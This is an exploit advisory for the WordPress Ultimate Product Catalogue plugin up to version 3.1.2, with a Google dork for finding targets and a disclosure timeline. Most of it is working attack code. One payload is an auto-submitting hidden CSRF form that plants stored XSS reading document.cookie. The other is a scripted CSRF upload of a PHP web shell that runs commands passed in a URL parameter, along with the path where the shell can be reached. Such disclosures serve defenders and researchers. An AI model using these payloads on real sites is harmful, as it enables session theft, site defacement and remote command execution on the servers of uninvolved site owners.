WordPress Ultimate Product Catalogue 3.1.2 XSS / CSRF / File Upload

`# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate  
Product Catalogue 3.1.2  
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"  
intext:"Category",  
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"  
# Date: 22/04/2015  
# Exploit Author: Felipe Molina de la Torre (@felmoltor)  
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/  
# Software Link:  
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip  
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5  
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache  
2.4.0 (Ubuntu)  
# CVE : N/A  
# Category: webapps  
  
1. Summary:  
  
Ultimate Product Catalogue is a responsive and easily customizable plugin  
for all your product catalogue needs. It has +63.000 downloads, +4.000  
active installations.  
  
Product Name and Description and File Upload formulary of plugin Ultimate  
Product Catalog lacks of proper CSRF protection and proper filtering.  
Allowing an attacker to alter a product pressented to a customer or the  
wordpress administrators and insert XSS in his product name and  
description. It also allows an attacker to upload a php script though a  
CSRF due to a lack of file type filtering when uploading it.  
  
2. Vulnerability timeline:  
- 22/04/2015: Identified in version 3.1.2  
- 22/04/2015: Comunicated to developer company etoilewebdesign.com  
  
- 22/04/2015: Response from etoilewebdesign.com  
  
and fixed two SQLi in 3.1.3 but not these vulnerabilities.  
- 28/04/2015: Fixed version in 3.1.5 without notifying me.  
  
3. Vulnerable code:  
  
In file html/ProductPage multiple lines.  
  
3. Proof of concept:  
  
https://www.youtube.com/watch?v=roB_ken6U4o  
  
  
----------------------------------------------------------------------------------------------  
------------- CSRF & XSS in Product Description and Name -----------  
  
----------------------------------------------------------------------------------------------  
  
<iframe width=0 height=0 style="display:none" name="csrf-frame"></iframe>  
<form method='POST'  
action='http://  
<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'  
target="csrf-frame"  
id="csrf-form">  
<input type='hidden' name='action' value='Edit_Product'>  
<input type='hidden' name='_wp_http_referer'  
value='/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'/>  
<input type='hidden' name='Item_Name' value="Product  
name</a><script>alert('Product Name says: '+document.cookie)</script><a>"/>  
<input type='hidden' name='Item_Slug' value='asdf'/>  
<input type='hidden' name='Item_ID' value='16'/>  
<input type='hidden' name='Item_Image' value='  
http://i.imgur.com/6cWKujq.gif'>  
<input type='hidden' name='Item_Price' value='666'>  
<input type='hidden' name='Item_Description' value="Product  
description says<script>alert('Product description says:  
'+document.cookie)</script>"/>  
<input type='hidden' name='Item_SEO_Description' value='seo desc'>  
<input type='hidden' name='Item_Link' value=''>  
<input type='hidden' name='Item_Display_Status' value='Show'>  
<input type='hidden' name='Category_ID' value=''>  
<input type='hidden' name='SubCategory_ID' value=''>  
<input style="display:none" type='submit' value='submit'>  
</form>  
<script>document.getElementById("csrf-form").submit()</script>  
  
  
  
----------------------------------------------------------------------------------------------  
-------- CSRF & File Upload in Product Description and Name ------  
  
----------------------------------------------------------------------------------------------  
  
<html>  
<body onload="submitRequest();">  
<script>  
function submitRequest()  
{  
var xhr = new XMLHttpRequest();  
xhr.open("POST",  
"http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product",  
true);  
xhr.setRequestHeader("Host", "<web>");  
xhr.setRequestHeader("Accept",  
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");  
xhr.setRequestHeader("Cache-Control", "max-age=0");  
xhr.setRequestHeader("Accept-Language",  
"en-US,en;q=0.8,es;q=0.6");  
xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT  
6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37  
Safari/537.36");  
xhr.setRequestHeader("Accept-Encoding", "gzip, deflate");  
xhr.setRequestHeader("Content-Type", "multipart/form-data;  
boundary=----WebKitFormBoundarylPTZvbxAcw0q01W3");  
var body = "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +  
"Content-Disposition: form-data;  
name=\"Products_Spreadsheet\"; filename=\"cooldog.php\"\r\n" +  
"Content-Type: application/octet-stream\r\n" +  
"\r\n" +  
"<?php\r\n" +  
"exec($_GET['c'],$output);\r\n" +  
"foreach ($output as $line) {\r\n" +  
"echo \"<br/>\".$line;\r\n" +  
"}\r\n" +  
"?>\r\n" +  
"------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +  
"Content-Disposition: form-data; name='submit'\r\n" +  
"\r\n" +  
"Add New Products\r\n" +  
"------WebKitFormBoundarylPTZvbxAcw0q01W3--\r\n" ;  
var aBody = new Uint8Array(body.length);  
for (var i = 0; i < aBody.length; i++)  
aBody[i] = body.charCodeAt(i);  
xhr.send(new Blob([aBody]));  
}  
</script>  
<form action="#">  
<input style="display:none;" type="submit" value="Up!"  
onclick="submitRequest();" />  
</form>  
</body>  
</html>  
  
Te file cooldog.php is no available in path http://  
<web>/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php  
  
  
`